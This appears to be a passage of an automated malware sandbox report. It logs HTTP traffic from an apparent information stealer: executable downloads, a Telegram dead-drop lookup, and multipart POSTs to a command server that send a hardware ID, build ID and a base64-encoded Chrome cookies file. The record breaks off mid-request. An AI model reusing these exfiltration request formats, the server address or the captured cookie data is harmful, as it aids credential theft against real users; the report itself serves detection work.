00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:46 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:46 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:54 GMTContent-Type: application/octet-streamContent-Length: 551424Last-Modified: Tue, 08 Oct 2024 02:18:36 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "6704967c-86a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 89 39 06 79 e8 57 55 79 e8 57 55 79 e8 57 55 aa 9a 54 54 75 e8 57 55 aa 9a 52 54 d2 e8 57 55 aa 9a 53 54 6c e8 57 55 aa 9a 56 54 7a e8 57 55 79 e8 56 55 21 e8 57 55 69 6c 54 54 6d e8 57 55 69 6c 53 54 6b e8 57 55 69 6c 52 54 34 e8 57 55 31 6d 5e 54 78 e8 57 55 31 6d a8 55 78 e8 57 55 31 6d 55 54 78 e8 57 55 52 69 63 68 79 e8 57 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7b 96 04 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 12 02 00 00 62 06 00 00 00 00 00 52 6f 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 e3 b7 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c6 02 00 28 00 00 00 00 80 08 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 d4 1a 00 00 c0 ab 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ab 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 10 02 00 00 10 00 00 00 12 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 9d 00 00 00 30 02 00 00 9e 00 00 00 16 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 a3 05 00 00 d0 02 00 00 96 05 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 03 00 00 00 80 08 00 00 04 00 00 00 4a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 1a 00 00 00 90 08 00 00 1c 00 00 00 4e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /maslengdsa HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: kasm.zubairgul.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 46 39 31 35 44 38 30 32 46 37 33 38 39 37 32 35 30 38 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="hwid"CDF915D802F73897250831-a33c7340-61ca------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------AFIDGDBGCAAFIDHIJKEH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="mode"1------JKECFCFBGDHIECAAFIID--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 2d 2d 0d 0a Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="mode"2------AKECBFBAEBKJJJJKFCGC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: kasm.zubairgul.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="mode"21------FBFHDBKJEGHJJJKFIIJE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: kasm.zubairgul.comContent-Length: 7341Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEBHost: kasm.zubairgul.comContent-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 2d 2d 0d 0a Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="file_name"Q29
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: kasm.zubairgul.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 